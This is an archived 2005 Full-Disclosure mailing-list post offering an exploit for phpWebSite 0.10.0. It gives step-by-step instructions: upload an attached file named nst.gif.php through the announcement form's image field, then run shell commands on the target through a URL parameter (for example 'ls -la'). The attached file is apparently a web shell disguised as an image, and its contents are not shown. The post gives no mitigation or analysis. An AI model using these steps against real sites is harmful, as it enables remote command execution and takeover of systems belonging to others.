[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] phpWebSite-0.10.0_exploit

To: full-disclosure@xxxxxxxxxxxxxxxx
Subject: [Full-Disclosure] phpWebSite-0.10.0_exploit
From: tjomka <tjomka@xxxxxxxxxxxx>
Date: Fri, 25 Feb 2005 00:16:59 +0200

phpWebSite-0.10.0_exploit

Attachment: nst.gif.php
Description: Binary data

oooo...oooo.oooooooo8.ooooooooooo 
.8888o..88.888........88..888..88 
.88.888o88..888oooooo.....888     
.88...8888.........888....888     
o88o....88.o88oooo888....o888o    
********************************
**** Network security team *****
********* nst.e-nex.com ********
********************************
* Title: phpWebSite <= v0.10.0
* Bug found by: nst
* Date: 24.02.2005
********************************

Web: phpwebsite.appstate.edu

http://target/index.php?module=announce&ANN_user_op=submit_announcement&MMN_position=3:3

1. Fill all inputs
2. in Image: select nst.gif.php

press Save.

Go here http://target/images/announce/nst.gif.php?nst=ls -la

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Follow-Ups:
- Re: [Full-Disclosure] phpWebSite-0.10.0_exploit
  - From: Colin . Scott

Prev by Date: Re: [Full-Disclosure] Xfree86 video buffering?
Next by Date: Re: [Full-Disclosure] Xfree86 video buffering?
Previous by thread: RE: [Full-Disclosure] GAIM exploit
Next by thread: Re: [Full-Disclosure] phpWebSite-0.10.0_exploit
Index(es):
- Date
- Thread